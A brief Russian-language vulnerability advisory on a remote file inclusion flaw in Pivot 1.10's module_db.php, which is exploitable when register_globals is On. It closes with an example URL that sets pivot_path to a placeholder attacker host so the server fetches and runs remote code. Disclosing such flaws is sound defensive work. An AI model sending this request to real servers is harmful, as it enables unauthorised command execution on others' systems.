Программа: Pivot 1.10
Уязвимость обнаружена в Pivot в файле 'module_db.php'. Удаленный атакующий может выполнять произвольные команды на системе.
Уязвимость позволяет атакующему выполнить внешний сценарий на уязвимом сервере. В конфигурации, когда значение для ‘register_globals’ равно ‘On’ в файле php.ini, атакующий может изменить значение переменной $pivot_path на удаленный источник.
Пример:
http://host.com/pivot/modules/module_db.php? pivot_path=http://[hacker]
